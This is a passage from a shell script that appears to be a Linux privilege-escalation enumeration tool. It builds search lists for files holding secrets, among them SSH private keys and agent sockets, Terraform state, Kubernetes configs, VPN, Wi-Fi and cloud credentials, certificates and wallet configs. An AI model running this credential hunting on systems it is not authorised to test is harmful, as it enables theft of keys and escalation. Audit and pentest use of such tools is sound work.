"$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/init.d/|/sbin/|/usr/share/' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "rpcd$" | sort | uniq | head -n 70) 820 PSTORAGE_BITCOIN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "bitcoin\.conf$" | sort | uniq | head -n 70) 821 PSTORAGE_HOSTAPD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) 822 PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "system-connections$|wpa_supplicant$" | sort | uniq | head -n 70) 823 PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "pam\.d$" | sort | uniq | head -n 70) 824 PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "exports$" | sort | uniq | head -n 70) 825 PSTORAGE_GLUSTERFS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "glusterfs\.pem$|glusterfs\.ca$|glusterfs\.key$" | sort | uniq | head -n 70) 826 PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) 827 PSTORAGE_TERRAFORM=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.tfstate$|.*\.tf$|credentials\.tfrc\.json$" | sort | uniq | head -n 70) 828 PSTORAGE_RACOON=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) 829 PSTORAGE_KUBERNETES=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}run|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*kubeconfig.*$|admin\.conf$|bootstrap-kubelet\.conf$|kubelet\.conf$|\.kube.*$|kubernetes$|kubelet$|kube-proxy$|kubernetes\.io$|net\.d$|containerd$|crio$|etcd$|origin$|k0s$|k3s$|rke2$|microk8s$" | sort | uniq | head -n 70) 830 PSTORAGE_VNC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/mime/' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) 831 PSTORAGE_LDAP=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "ldap$" | sort | uniq | head -n 70) 832 PSTORAGE_LOG4SHELL=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}bin" | grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70) 833 PSTORAGE_OPENVPN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) 834 PSTORAGE_SSH=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$|.*\.pub$" | sort | uniq | head -n 70) 835 PSTORAGE_CERTSB4=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib.*' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) 836 PSTORAGE_CERTSBIN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '^/usr/share/|/usr/local/lib/|/usr/lib/.*|/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) 837 PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) 838 PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '.dll' | grep -E "^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}run" | grep -E "agent\..*$|ssh-agent\.sock$" | sort | uniq | head -n 70) 839 PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^$GREPHOMESEARCH|^${ROOT_FOLDER}usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) 840 PSTORAGE_SNYK=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "snyk\.json$|snyk\.config\.json$" | sort | uniq | head -n 70) 841 PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 